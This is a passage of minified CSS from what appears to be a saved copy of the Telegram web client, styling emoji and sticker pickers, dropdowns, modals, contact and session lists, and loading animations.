  1674. .composer_emoji_tooltip_tab_stickers_content .composer_emoji_tooltip_categories .composer_sticker_btn{width:36px;height:34px;padding:3px 4px;vertical-align:top;margin:4px 0 0}
  1675. .composer_emoji_tooltip_tab_stickers_content .composer_emoji_tooltip_categories .composer_sticker_image{max-width:28px;max-height:28px}
  1676. .composer_emoji_tooltip_category{line-height:0;color:#fff;display:inline-block;cursor:pointer;opacity:.3;padding:9px 12px}
  1677. .composer_emoji_tooltip_category:hover{opacity:.4}
  1678. .composer_emoji_tooltip_category.active,.composer_emoji_tooltip_category.active:hover{opacity:1}
  1679. .composer_emoji_tooltip_category i{display:inline-block;width:21px;height:21px;background-image:/*savepage-url=../img/icons/IconsetSmiles.png*/url();background-repeat:no-repeat}
  1680. .is_2x .composer_emoji_tooltip_category i{background-image:/*savepage-url=../img/icons/IconsetSmiles_2x.png*/url();background-size:27px 362px}
  1681. .composer_emoji_tooltip_category_recent{background-position:-3px 0}
  1682. .active .composer_emoji_tooltip_category_recent{background-position:-3px -31px}
  1683. .composer_emoji_tooltip_category_smile{background-position:-3px -62px}
  1684. .active .composer_emoji_tooltip_category_smile{background-position:-3px -93px}
  1685. .composer_emoji_tooltip_category_flower{background-position:-3px -124px}
  1686. .active .composer_emoji_tooltip_category_flower{background-position:-3px -155px}
  1687. .composer_emoji_tooltip_category_bell{background-position:-3px -185px}
  1688. .active .composer_emoji_tooltip_category_bell{background-position:-3px -213px}
  1689. .composer_emoji_tooltip_category_car{background-position:-3px -241px}
  1690. .active .composer_emoji_tooltip_category_car{background-position:-3px -269px}
  1691. .composer_emoji_tooltip_category_grid{background-position:-3px -297px}
  1692. .active .composer_emoji_tooltip_category_grid{background-position:-3px -324px}
  1693. .composer_emoji_tooltip_tabs_wrap{height:275px;width:284px;position:relative;overflow:hidden}
  1694. .composer_emoji_tooltip_tabs_contents{position:absolute;width:568px}
  1695. .non_msie .composer_emoji_tooltip_tabs_contents{transition:transform ease-in-out .2s;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-o-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}
  1696. .non_msie .composer_emoji_tooltip_tabs_stickers_active .composer_emoji_tooltip_tabs_contents{-webkit-transform:translate3d(-284px,0,0);-moz-transform:translate3d(-284px,0,0);-o-transform:translate3d(-284px,0,0);-ms-transform:translate3d(-284px,0,0);transform:translate3d(-284px,0,0)}
  1697. .msie .composer_emoji_tooltip_tabs_contents{margin-left:0;transition:margin-left ease-in-out .2s}
  1698. .msie .composer_emoji_tooltip_tabs_stickers_active .composer_emoji_tooltip_tabs_contents{margin-left:-284px}
  1699. .composer_emoji_tooltip_tab_emoji_content,.composer_emoji_tooltip_tab_stickers_content{width:284px;height:275px;float:left}
  1700. .composer_emoji_tooltip_content_stickers{position:relative}
  1701. .composer_emoji_tooltip_content_wrap{padding:0 2px 0 8px}
  1702. .composer_emoji_tooltip .scroller_scrollable_container{height:233px;position:relative}
  1703. .composer_emoji_tooltip_content{padding-top:10px;padding-right:8px;outline:0!important}
  1704. a.composer_emoji_btn{margin:0 2px 0 0;padding:5px;display:block;float:left;border-radius:2px}
  1705. a.composer_emoji_btn:hover{background-color:#edf2f5}
  1706. .emoji{-moz-box-orient:vertical;display:inline-block;vertical-align:baseline;height:18px;width:18px;background-repeat:no-repeat;text-indent:-9999px;border:0}
  1707. .emoji-spritesheet-0{background-size:486px 126px;background-image:/*savepage-url=../img/emojisprite_0.png*/url()}
  1708. .emoji-spritesheet-1{background-size:522px 72px;background-image:/*savepage-url=../img/emojisprite_1.png*/url()}
  1709. .emoji-spritesheet-2{background-size:594px 126px;background-image:/*savepage-url=../img/emojisprite_2.png*/url()}
  1710. .emoji-spritesheet-3{background-size:612px 54px;background-image:/*savepage-url=../img/emojisprite_3.png*/url()}
  1711. .emoji-spritesheet-4{background-size:612px 126px;background-image:/*savepage-url=../img/emojisprite_4.png*/url()}
  1712. .emoji-w20{width:20px;height:20px;vertical-align:middle;display:inline-block}
  1713. .emoji-w20.emoji-spritesheet-0{background-size:540px 140px}
  1714. .emoji-w20.emoji-spritesheet-1{background-size:580px 80px}
  1715. .emoji-w20.emoji-spritesheet-2{background-size:660px 140px}
  1716. .emoji-w20.emoji-spritesheet-3{background-size:680px 60px}
  1717. .emoji-w20.emoji-spritesheet-4{background-size:680px 140px}
  1718. .emoji-w26{width:26px;height:26px;vertical-align:middle;display:inline-block}
  1719. .emoji-w26.emoji-spritesheet-0{background-size:702px 182px}
  1720. .emoji-w26.emoji-spritesheet-1{background-size:754px 104px}
  1721. .emoji-w26.emoji-spritesheet-2{background-size:858px 182px}
  1722. .emoji-w26.emoji-spritesheet-3{background-size:884px 78px}
  1723. .emoji-w26.emoji-spritesheet-4{background-size:884px 182px}
  1724. .composer_dropdown_wrap{background:#FFF;display:none;position:absolute;z-index:10;border:0;-webkit-box-shadow:0 1px 1px 0 rgba(60,75,87,.27);-moz-box-shadow:0 1px 1px 0 rgba(60,75,87,.27);box-shadow:0 1px 1px 0 rgba(60,75,87,.27);border-radius:0;margin-top:-5px;margin-left:-1px;width:380px}
  1725. .composer_dropdown{position:static;display:block;float:none;top:auto;left:auto;border:0;border-radius:0;padding:0;margin:0;z-index:auto}
  1726. .composer_dropdown>li>a{display:block;font-size:13px;line-height:15px;padding:4px 10px;color:#52719a}
  1727. .composer_dropdown li a:hover,.composer_dropdown li.composer_autocomplete_option_active a{color:#52719a;background:#f2f6fa;text-decoration:none}
  1728. .composer_emoji_shortcut{display:inline-block;vertical-align:top;margin-left:15px;line-height:20px}
  1729. .composer_mention_option{line-height:20px}
  1730. .composer_user_mention{color:grey;margin-left:7px}
  1731. .composer_dropdown li a:hover .composer_user_mention,.composer_dropdown li.composer_autocomplete_option_active a .composer_user_mention{color:#698192}
  1732. span.composer_user_photo{display:inline-block;width:32px;height:32px;border-radius:50%;overflow:hidden;margin-right:10px;vertical-align:top}
  1733. img.composer_user_photo{width:32px;height:32px;vertical-align:top}
  1734. span.composer_user_photo .peer_initials{line-height:32px;font-size:14px}
  1735. .composer_user_mention,.composer_user_name{display:inline-block;line-height:32px;vertical-align:top}
  1736. .composer_dropdown a.composer_command_option{color:grey;line-height:32px;padding-right:5px;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}
  1737. .composer_dropdown .composer_command_value{color:#52719a;display:inline}
  1738. .composer_dropdown .composer_command_desc{display:inline;color:grey;padding-left:7px;font-weight:400;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}
  1739. .composer_autocomplete_option_active a.composer_command_option .composer_command_desc,a.composer_command_option:hover .composer_command_desc{color:#698192}
  1740. .composer_command_desc .emoji{vertical-align:text-bottom}
  1741. .composer_stickerset_title{display:block;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;font-weight:700;font-size:13px;color:#444;margin:10px 0 3px;padding:0 6px}
  1742. .composer_stickerset_wrap:first-child .composer_stickerset_title{margin-top:0}
  1743. .composer_stickerset_title:hover{color:#444}
  1744. .composer_sticker_btn{width:66px;height:66px;display:inline-block;text-align:center;padding:3px;vertical-align:top}
  1745. .composer_sticker_btn:hover{background:#f2f6fa}
  1746. .composer_sticker_image{max-width:60px;max-height:60px;vertical-align:middle}
  1747. .composer_rich_textarea{font-size:12px;margin-bottom:10px;padding:6px;min-height:38px;height:auto;width:auto;max-height:284px;overflow:auto;line-height:17px;border:1px solid #d2dbe3;border-radius:2px;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;-ms-box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;box-sizing:content-box;-webkit-transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s;transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s;word-wrap:break-word;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;user-select:text}
  1748. .composer_rich_textarea:empty::before{content:attr(placeholder);color:#9aa2ab;display:block;margin-top:-1px;margin-left:1px;pointer-events:none}
  1749. .composer_rich_textarea:empty:active::before,.composer_rich_textarea:empty:focus::before{opacity:.75}
  1750. .composer_rich_textarea img{width:20px;height:20px;vertical-align:middle;margin:-3px 0 0}
  1751. @-moz-document url-prefix(){.composer_rich_textarea:empty:active:before,.composer_rich_textarea:empty:focus:before{display:none}}
  1752. .composer_rich_textarea:empty:active:before,_:-ms-lang(x){display:none}
  1753. .composer_rich_textarea:empty:focus:before,_:-ms-lang(x){display:none}
  1754. .composer_command_btn{display:block;position:absolute;right:37px;top:4px;cursor:pointer;padding:0;width:20px;height:20px}
  1755. .icon-slash{display:inline-block;width:20px;height:20px;vertical-align:top;opacity:.8;background-image:/*savepage-url=../img/icons/General.png*/var(--savepage-url-3);background-repeat:no-repeat;background-position:-10px -790px}
  1756. .is_2x .icon-slash{background-image:/*savepage-url=../img/icons/General_2x.png*/url();background-size:40px 948px}
  1757. .composer_command_btn.active .icon-slash{background-position:-10px -820px}
  1758. .composer_command_btn:hover .icon-slash{opacity:1}
  1759. .composer_keyboard_btn{display:block;position:absolute;right:37px;top:4px;cursor:pointer;padding:0;width:20px;height:20px}
  1760. .icon-keyboard{display:inline-block;width:20px;height:20px;vertical-align:top;opacity:.8;background-image:/*savepage-url=../img/icons/General.png*/var(--savepage-url-3);background-repeat:no-repeat;background-position:-10px -730px}
  1761. .is_2x .icon-keyboard{background-image:/*savepage-url=../img/icons/General_2x.png*/url();background-size:40px 948px}
  1762. .composer_keyboard_btn.active .icon-keyboard{background-position:-10px -760px}
  1763. .composer_keyboard_btn:hover .icon-keyboard{opacity:1}
  1764. .inline_switch_pm{text-decoration:none!important;display:block;font-size:13px;font-weight:700;line-height:15px;padding:10px;text-align:center;color:#52719a}
  1765. .inline_switch_pm:hover{background:#f2f6fa;color:#52719a}
  1766. .inline_results_wrap{line-height:0}
  1767. .inline_result_wrap{display:block}
  1768. .inline_result_gif,.inline_result_photo,.inline_result_sticker{display:inline-block;padding:1px}
  1769. .inline_result_article{display:block}
  1770. .inline_article_thumb_wrap{width:50px;height:50px;margin-right:10px;text-align:center}
  1771. .inline_article_thumb{max-width:50px;max-height:50px;line-height:0}
  1772. .inline_result_video .inline_article_thumb_wrap{width:90px;height:50px}
  1773. .inline_result_video .inline_article_thumb{max-width:90px;max-height:50px}
  1774. .inline_article_thumb_initials{color:#999;background:#EEE;line-height:50px;text-align:center;font-size:25px;text-transform:uppercase}
  1775. li a:hover .inline_article_thumb_initials,li.composer_autocomplete_option_active a .inline_article_thumb_initials{color:#698192;background:#e0e9f3}
  1776. .inline_article_content_wrap{overflow:hidden;pointer-events:none}
  1777. .inline_article_description,.inline_article_thumb_wrap,.inline_article_title,.inline_article_url{pointer-events:none}
  1778. .inline_article_title{color:#222;font-weight:700;font-size:12px}
  1779. .inline_article_description{color:grey;padding-top:4px;font-size:12px}
  1780. li a:hover .inline_article_description,li.composer_autocomplete_option_active a .inline_article_description{color:#698192}
  1781. .inline_article_url{padding-top:4px}
  1782. .composer_dropdown>li.inline_result_gif>a,.composer_dropdown>li.inline_result_photo>a,.composer_dropdown>li.inline_result_sticker>a{padding:0;line-height:0;display:block;overflow:hidden}
  1783. li.inline_result_gif.composer_autocomplete_option_active a,li.inline_result_photo.composer_autocomplete_option_active a,li.inline_result_sticker.composer_autocomplete_option_active a{position:relative}
  1784. li.inline_result_gif.composer_autocomplete_option_active a .inline_result_ind,li.inline_result_photo.composer_autocomplete_option_active a .inline_result_ind,li.inline_result_sticker.composer_autocomplete_option_active a .inline_result_ind{display:block;background:rgba(255,255,255,.3);width:100%;height:100%;position:absolute}
  1785. .inline_result_gif .img_gif_video,.inline_result_photo .inline_result_photo_image{object-fit:cover}
  1786. .inline_result_sticker img{object-fit:contain}
  1787. .inline_result_game img{object-fit:cover;width:50px;height:50px}
  1788. .inline_result_gif_http,.inline_result_gif_mtproto,.inline_result_photo_http,.inline_result_photo_mtproto{pointer-events:none}
  1789. .im_voice_recorder_wrap{display:none;z-index:100}
  1790. .im_recorder_indicator,.im_recorder_time{float:left;vertical-align:middle;color:#333}
  1791. .im_recorder_indicator i{background-color:#ff1010;height:10px;width:10px;border-radius:50%;margin-right:5px;vertical-align:baseline;display:inline-block;animation:blinker .5s cubic-bezier(.5,0,1,1) infinite alternate}
  1792. @keyframes blinker{from{opacity:1}
  1793. to{opacity:0}}
  1794. .im_recorder_label{overflow:auto;font-size:12px;text-align:center;vertical-align:middle;color:#3a6d99;transition:color linear .2s}
  1795. .im_recorder_label i{margin-right:5px}
  1796. .im_send_form_hover .im_recorder_label{color:#CCC}
  1797. .im_recorder_label_hover,.im_send_form_hover .im_recorder_label_hout{display:none}
  1798. .im_send_form_hover .im_recorder_label_hover{display:inline}
  1799. .im_processing_recording,.im_voice_recording{color:#AAA}
  1800. .im_processing_recording .im_voice_recorder_wrap,.im_voice_recording .im_voice_recorder_wrap{display:block}
  1801. .error_modal_description{color:#999;padding:5px 0;font-size:13px;line-height:160%}
  1802. .md_simple_modal_alert_body .error_modal_description,.md_simple_modal_alert_body .md_simple_header{text-align:center}
  1803. .error_modal_details textarea{display:block;font-family:Menlo,Monaco,Consolas,"Courier New",monospace;font-size:10px;line-height:100%;white-space:pre-wrap;padding:4px;margin:10px 0;word-break:break-all;word-wrap:break-word;color:#333;background-color:#f5f5f5;border:1px solid #ccc;border-radius:4px;width:100%;text-align:left}
  1804. .error_modal_details_link,.error_modal_details_link:hover{font-size:11px;color:#999}
  1805. .confirm_modal_description{text-align:center;padding:20px 0;font-size:14px;line-height:160%}
  1806. .confirm_phone_number{font-weight:700;padding:15px 10px 0;text-align:center}
  1807. .confirm_modal_extlink_jump{word-break:break-all}
  1808. .confirm_modal_paste_image{max-width:274px;height:274px;background-position:50% 50%;background-size:contain;background-repeat:no-repeat;margin:10px auto -10px}
  1809. .document_modal_window,.photo_modal_window,.video_modal_window{display:block}
  1810. .photo_modal_error{color:#999;position:absolute;width:100%;top:50%;margin-top:-20px;padding:0 20px;text-align:center;font-size:1.4em;line-height:160%}
  1811. .video_full_error{border-radius:10px;overflow:hidden;background:rgba(0,0,0,.6);color:#fff;position:absolute;top:50%;margin:-40px 10px 0;padding:10px;text-align:center;font-size:1.4em;line-height:160%}
  1812. .settings_modal_wrap .im_attach_input{z-index:999}
  1813. .settings_modal_username_link,.settings_modal_username_link:hover{color:inherit}
  1814. .settings_external_service{line-height:0;display:inline-block;padding:7px 9px}
  1815. .settings_about_section_body{padding-right:0}
  1816. .settings_about_section_body p{margin-top:7px;margin-bottom:3px}
  1817. .icon-github{display:inline-block;width:59px;height:18px;background-image:/*savepage-url=../img/icons/AboutLogos.png*/url();background-repeat:no-repeat;background-position:0 -5px}
  1818. .is_2x .icon-github{background-image:/*savepage-url=../img/icons/AboutLogos_2x.png*/url();background-size:60px 136px}
  1819. a:hover .icon-github{background-position:0 -43px}
  1820. .icon-twitter{display:inline-block;width:20px;height:15px;margin-top:1px;background-image:/*savepage-url=../img/icons/AboutLogos.png*/url();background-repeat:no-repeat;background-position:0 -81px}
  1821. .is_2x .icon-twitter{background-image:/*savepage-url=../img/icons/AboutLogos_2x.png*/url();background-size:60px 136px}
  1822. a:hover .icon-twitter{background-position:0 -116px}
  1823. .contacts_modal_search{position:relative;padding:7px 12px 6px;-webkit-box-shadow:0 1px 1px rgba(0,0,0,.15);-moz-box-shadow:0 1px 1px rgba(0,0,0,.15);box-shadow:0 1px 1px rgba(0,0,0,.15);z-index:1}
  1824. .contacts_modal_search_field{font-size:12px;line-height:normal;border:1px solid #fff!important;border-radius:2px;padding:6px 27px 6px 30px;margin:0;background-image:/*savepage-url=../img/icons/IconsetW.png*/url();background-repeat:no-repeat;background-position:-6px -205px}
  1825. .is_2x .contacts_modal_search_field{background-image:/*savepage-url=../img/icons/IconsetW_2x.png*/url();background-size:42px 1171px}
  1826. .contacts_modal_search_field::-ms-clear{display:none}
  1827. a.contacts_modal_search_clear{right:9px;margin-top:-24px}
  1828. .contacts_scrollable_wrap{outline:0!important}
  1829. .contacts_modal_contacts_empty{visibility:hidden;text-align:center;color:#999;font-size:16px;line-height:160%;padding:1px 50px;margin:0}
  1830. .contacts_modal_contacts_empty.vertical-aligned{visibility:visible}
  1831. .contacts_modal_members_list .contacts_modal_contact_wrap{margin-top:0}
  1832. .contacts_modal_members_list a.contacts_modal_contact{clear:both;overflow:hidden;color:#000;padding:8px 9px;border-radius:0}
  1833. .contacts_modal_members_list .active a.contacts_modal_contact,.contacts_modal_members_list .active a.contacts_modal_contact:hover,.contacts_modal_members_list a.contacts_modal_contact:hover{background:#f2f6fa}
  1834. .contacts_modal_contact_name{display:block;color:#3C6E97;font-weight:700;margin:1px 0 2px}
  1835. .non_osx .contacts_modal_contact_name{font-size:12px}
  1836. .contacts_modal_contact_photo{width:40px;height:40px;margin-right:10px;overflow:hidden;border-radius:20px}
  1837. .contacts_modal_contact_photo .peer_initials{line-height:40px;font-size:15px}
  1838. .contacts_modal_contact_status{color:#999}
  1839. .contacts_modal_members_list .active a.contacts_modal_contact .contacts_modal_contact_status,.contacts_modal_members_list .active a.contacts_modal_contact .md_modal_list_peer_description,a.contacts_modal_contact:hover .contacts_modal_contact_status,a.contacts_modal_contact:hover .md_modal_list_peer_description{color:#91a6ba}
  1840. h4.chat_modal_migrate_header{font-size:inherit;font-weight:700;color:inherit}
  1841. ul.chat_modal_migrate_list{margin-top:10px;padding-left:15px}
  1842. .chat_modal_participant_wrap{padding:8px 0;border-top:1px solid #F0F0F0}
  1843. .chat_modal_participant_wrap:first-child{border-top:0}
  1844. .chat_modal_participant_kick{padding:11px 0;display:block}
  1845. .chat_modal_participant_name{display:block;color:#3C6E97;font-weight:700;margin:1px 0 2px}
  1846. .non_osx .chat_modal_participant_name{font-size:12px}
  1847. .chat_modal_participant_status{color:#999}
  1848. a.chat_modal_participant_photo{width:40px;height:40px;margin-right:10px;border-radius:20px;overflow:hidden}
  1849. img.chat_modal_participant_photo{width:40px;height:40px}
  1850. .chat_modal_participant_photo .peer_initials{line-height:40px;font-size:15px}
  1851. .chat_modal_members_forbidden{color:#999}
  1852. .icon-contact-tick{position:absolute;right:10px;top:17px;display:inline-block;width:25px;height:25px;opacity:.5;background-image:/*savepage-url=../img/icons/IconsetW.png*/url();background-repeat:no-repeat;background-position:-9px -516px}
  1853. .is_2x .icon-contact-tick{background-image:/*savepage-url=../img/icons/IconsetW_2x.png*/url();background-size:42px 1171px}
  1854. .contacts_modal_members_list .contacts_modal_contact_wrap:hover .icon-contact-tick{background-position:-9px -481px;opacity:.5}
  1855. .contacts_modal_members_list .contacts_modal_contact_wrap.active .icon-contact-tick{background-position:-9px -481px;opacity:1}
  1856. .contacts_modal_members_list .disabled{pointer-events:none}
  1857. .contacts_modal_members_list .disabled .icon-contact-tick{display:none}
  1858. .sessions_modal_session{padding:8px 24px}
  1859. .sessions_modal_sessions_header{color:#999;font-size:13px;margin-left:16px;margin-top:20px;font-weight:700}
  1860. .sessions_modal_terminate_all_wrap{margin:5px 0 0 24px}
  1861. .sessions_modal_sessions_list{padding:14px 0 10px;margin-bottom:10px}
  1862. .session_active_date_online{color:#3a6d99}
  1863. .sessions_modal_loading{text-align:center;color:#999;font-size:16px;line-height:18px;padding:1px 50px;margin:0}
  1864. .session_active_date{color:#999}
  1865. .session_meta_wrap{text-align:right}
  1866. .session_terminate_btn{margin-top:24px;display:inline-block}
  1867. .sessions_modal_session_app{font-weight:700;font-style:12px;margin-bottom:3px}
  1868. .sessions_modal_session_device{margin:3px 0}
  1869. .sessions_modal_session_location{color:#777}
  1870. .sessions_modal_other_splitter{margin:15px 0 20px 24px}
  1871. .stickerset_modal_window .modal-dialog{max-width:642px;width:auto}
  1872. .stickerset_modal_stickers_list{padding:25px}
  1873. .stickerset_modal_sticker_wrap{margin:0 5px 5px 0;padding:0;position:relative;display:block;width:192px;height:192px;float:left;border-radius:3px;overflow:hidden}
  1874. .stickerset_modal_sticker_wrap:hover{background:#f2f6fa}
  1875. .stickerset_modal_sticker{width:192px;height:192px;text-align:center}
  1876. .stickerset_modal_sticker img{max-width:192px;max-height:192px}
  1877. .stickerset_modal_sticker_alt{position:absolute;bottom:0;right:0}
  1878. .stickerset_actions{padding:10px 20px;height:50px;text-align:center}
  1879. .stickerset_modal_loading{text-align:center;color:#999;font-size:16px;line-height:18px;padding:1px 50px;margin:0}
  1880. .modal-dialog{width:100%}
  1881. .confirm_modal_window .modal-dialog,.error_modal_window .modal-dialog,.md_simple_modal_window .modal-dialog{max-width:348px}
  1882. .im_message_focus_active .audio_player_duration,.im_message_focus_active .audio_player_size,.im_message_focus_active .im_message_author_admin,.im_message_focus_active .im_message_date,.im_message_focus_active .im_message_document_size,.im_message_focus_active .im_message_edited,.im_message_focus_active .im_message_fwd_date,.im_message_focus_active .im_message_sign_link,.im_message_focus_active .im_message_views_cnt{color:#899daf}
  1883. .im_message_focus_active .im_message_outer_wrap{background-color:rgba(242,246,250,0);animation-name:im_message_focus_fade;-webkit-animation-timing-function:ease-in;animation-timing-function:ease-out;animation-duration:4s}
  1884. @keyframes im_message_focus_fade{from{background-color:#f2f6fa}
  1885. to{background-color:rgba(242,246,250,0)}}
  1886. .user_color_1,.user_color_1:hover{color:#8365ab}
  1887. .user_color_2,.user_color_2:hover{color:#539e4f}
  1888. .user_color_3,.user_color_3:hover{color:#ae9661}
  1889. .user_color_4,.user_color_4:hover{color:#4979a3}
  1890. .user_color_5,.user_color_5:hover{color:#b7635d}
  1891. .user_color_6,.user_color_6:hover{color:#b3577a}
  1892. .user_color_7,.user_color_7:hover{color:#5397b4}
  1893. .user_color_8,.user_color_8:hover{color:#c07844}
  1894. .user_bgcolor_1{background:#cc90e2}
  1895. .user_bgcolor_2{background:#80d066}
  1896. .user_bgcolor_3{background:#ecd074}
  1897. .user_bgcolor_4{background:#6fb1e4}
  1898. .user_bgcolor_5{background:#e57979}
  1899. .user_bgcolor_6{background:#f98bae}
  1900. .user_bgcolor_7{background:#73cdd0}
  1901. .user_bgcolor_8{background:#fba76f}
  1902. a.peer_photo_init:active,a.peer_photo_init:focus,a.peer_photo_init:hover{text-decoration:none}
  1903. .peer_initials{display:block;color:#fff;text-align:center;text-transform:uppercase;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}
  1904. .im_dialogs_contacts_wrap h5,.im_dialogs_messages_wrap h5{color:#999;font-size:13px;margin-left:20px;font-weight:700}
  1905. .img_gif_image_wrap{position:relative;overflow:hidden}
  1906. .img_gif_meta{background:rgba(0,0,0,.4);width:40px;height:40px;line-height:0;position:absolute;z-index:2;border-radius:50%;overflow:hidden;margin:-20px auto 0 -20px;top:50%;left:50%;pointer-events:none}
  1907. .img_gif_label{font-weight:700;color:#FFF;display:block;line-height:40px;font-size:13px;text-align:center}
  1908. .img_gif_thumb{-webkit-filter:blur(2px);-moz-filter:blur(2px);-o-filter:blur(2px);-ms-filter:blur(2px);filter:blur(2px);filter:progid:DXImageTransform.Microsoft.Blur(PixelRadius='3');transform-origin:center center;-webkit-transform-origin:center center;-webkit-transform:scale(1.02,1.02);transform:scale(1.02,1.02);max-width:100%;height:auto}
  1909. .img_gif_meta_contents{transition:all cubic-bezier(.25,.46,.45,.94) .2s}
  1910. .img_gif_meta_contents.ng-enter,.img_gif_meta_contents.ng-leave.ng-leave-active{opacity:0}
  1911. .img_gif_meta_contents.ng-enter.ng-enter-active,.img_gif_meta_contents.ng-leave{opacity:1}
  1912. .img_round_with_progress_wrap{display:inline-block;line-height:0}
  1913. .img_round_image_wrap{position:relative;overflow:hidden;border-radius:50%;-webkit-transform:translateZ(0)}
  1914. .img_round_meta{background:rgba(0,0,0,.4);width:40px;height:40px;line-height:0;position:absolute;z-index:2;border-radius:50%;overflow:hidden;margin:-20px auto 0 -20px;top:50%;left:50%;pointer-events:none}
  1915. .img_round_video_unread .img_round_meta{background:rgba(100,144,177,.6)}
  1916. .icon-cancel{position:absolute;top:50%;left:50%;margin-left:-9px;margin-top:-1px}
  1917. .icon-cancel .icon-bar{display:block;width:18px;height:2px;background:#FFF;transform-origin:50% 50%}
  1918. .icon-cancel .icon-bar:first-child{-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);-o-transform:rotate(-45deg);-ms-transform:rotate(-45deg);transform:rotate(-45deg)}
  1919. .icon-cancel .icon-bar:last-child{-webkit-transform:translate3d(0,-2px,0) rotate(45deg);-moz-transform:translate3d(0,-2px,0) rotate(45deg);-o-transform:translate3d(0,-2px,0) rotate(45deg);-ms-transform:translate3d(0,-2px,0) rotate(45deg);transform:translate3d(0,-2px,0) rotate(45deg)}
  1920. .img_round_thumb{-webkit-filter:blur(2px);-moz-filter:blur(2px);-o-filter:blur(2px);-ms-filter:blur(2px);filter:blur(2px);filter:progid:DXImageTransform.Microsoft.Blur(PixelRadius='3');transform-origin:center center;-webkit-transform-origin:center center;-webkit-transform:scale(1.02,1.02);transform:scale(1.02,1.02);max-width:100%;height:auto}
  1921. .img_round_meta_contents{transition:all cubic-bezier(.25,.46,.45,.94) .2s}
  1922. .img_round_meta_contents.ng-enter,.img_round_meta_contents.ng-leave.ng-leave-active{opacity:0}
  1923. .img_round_meta_contents.ng-enter.ng-enter-active,.img_round_meta_contents.ng-leave{opacity:1}
  1924. .countries_modal_window .modal-dialog{max-width:392px}
  1925. .countries_modal_window .modal_simple_header{margin-bottom:12px;font-weight:400}
  1926. .countries_modal_search{padding:0 0 12px;margin:0 20px;position:relative}
  1927. .countries_modal_search_field{font-size:12px;line-height:normal;background-size:42px 1171px;border:1px solid #F2F2F2;border-radius:3px;padding:6px 20px 6px 30px;margin:0;background-color:#F2F2F2;background-image:/*savepage-url=../img/icons/IconsetW.png*/url();background-repeat:no-repeat;background-position:-6px -205px}
  1928. .is_2x .countries_modal_search_field{background-image:/*savepage-url=../img/icons/IconsetW_2x.png*/url();background-size:42px 1171px}
  1929. .countries_modal_search_field:active,.countries_modal_search_field:focus{background-color:#fff}
  1930. .countries_modal_search_field::-ms-clear{display:none}
  1931. a.countries_modal_search_clear{right:12px;margin-top:-34px}
  1932. .countries_modal_wrap .modal-body{padding:14px 0}
  1933. .countries_scrollable_wrap a.countries_modal_country{clear:both;overflow:hidden;color:#000;padding:8px 26px;font-size:12px;border-radius:0}
  1934. .countries_scrollable_wrap a.countries_modal_country:hover{border-radius:2px;background:#f2f6fa}
  1935. .countries_modal_country_code{color:#999}
  1936. .countries_scrollable_wrap a.countries_modal_country:hover .countries_modal_country_code{color:#698192}
  1937. .loading_dots{display:inline-block;font-size:1em;line-height:1;padding:.125em 0 .175em .15em}
  1938. .loading_dots i{border:.125rem solid;border-radius:50%;display:inline-block;height:.2rem;width:.2rem;margin-left:.2rem;-webkit-animation:loading_dots .8s linear infinite;-moz-animation:loading_dots .8s linear infinite;-ms-animation:loading_dots .8s linear infinite;animation:loading_dots .8s linear infinite}
  1939. .loading_dots i:nth-child(2){-webkit-animation-delay:.2s;-moz-animation-delay:.2s;-ms-animation-delay:.2s;animation-delay:.2s}
  1940. .loading_dots i:nth-child(3){-webkit-animation-delay:.4s;-moz-animation-delay:.4s;-ms-animation-delay:.4s;animation-delay:.4s}
  1941. @-webkit-keyframes loading_dots{0%{opacity:0}
  1942. 50%{opacity:1}
  1943. 100%{opacity:0}}
  1944. @-moz-keyframes loading_dots{0%{opacity:0}
  1945. 50%{opacity:1}
  1946. 100%{opacity:0}}
  1947. @-ms-keyframes loading_dots{0%{opacity:0}
  1948. 50%{opacity:1}
  1949. 100%{opacity:0}}
  1950. @keyframes loading_dots{0%{opacity:0}
  1951. 50%{opacity:1}
  1952. 100%{opacity:0}}
  1953. .telegram_modal_logo{background-image:/*savepage-url=../img/Telegram72.png*/url();background-repeat:no-repeat;background-position:0 0}
  1954. .is_2x .telegram_modal_logo{background-image:/*savepage-url=../img/Telegram72_2x.png*/url();background-size:72px 72px}
  1955. .changelog_modal_window .modal-dialog{max-width:480px}
  1956. .changelog_card_wrap{text-align:center;padding:12px 0 18px}
  1957. .changelog_header{margin-top:15px;font-size:16px}
  1958. .changelog_card{width:160px;height:160px;display:block;background:/*savepage-url=../img/changelog/card_wecandoit.png*/url() no-repeat;background-size:160px 160px;margin:0 auto}
  1959. .changelog_card_search{width:133px;height:133px;display:block;background:/*savepage-url=../img/changelog/search.png*/url() no-repeat;background-size:133px 133px;margin:0 auto}
  1960. .changelog_version_title{color:#9d9479;background:#efede3}
  1961. .changelog_version_changes_list li{line-height:20px}
  1962. .changelog_footer_wrap{padding:15px 28px 30px 120px}
  1963. .changelog_github_link{font-size:13px;float:right;color:#999}
  1964. .changelog_more_link{font-size:13px}
  1965. .bad_browser_wrap{border-radius:4px;border:1px solid #ccc;background:#fff;max-width:600px;margin:50px auto 0;padding:40px}
  1966. .bad_browser_wrap h2{margin-top:0}
  1967. .bad_browser_text{font-size:14px;line-height:160%;margin:25px 0 30px}
  1968. #nacl_listener{position:absolute;left:-10000px}
  1969. .peer_modal_profile_wrap{padding:35px 2px 0}
  1970. .peer_modal_photo{width:72px;height:72px;border-radius:36px;overflow:hidden}
  1971. a.peer_modal_photo,div.peer_modal_photo{display:block;margin-right:19px}
  1972. .peer_modal_photo .peer_initials{line-height:72px;font-size:22px}
  1973. .peer_modal_profile_name{font-size:14px;padding:15px 0 9px;font-weight:700}
  1974. .peer_modal_profile_description{color:#ccdeed}
  1975. .md_modal_split_action{display:block;background:#fff;float:right;position:relative;width:52px;height:52px;margin-left:20px;border-radius:26px;overflow:hidden;-webkit-box-shadow:0 1px 1px rgba(0,0,0,.2);-moz-box-shadow:0 1px 1px rgba(0,0,0,.2);box-shadow:0 1px 1px rgba(0,0,0,.2)}
  1976. .md_modal_split_actions{position:absolute;right:25px;top:-26px}
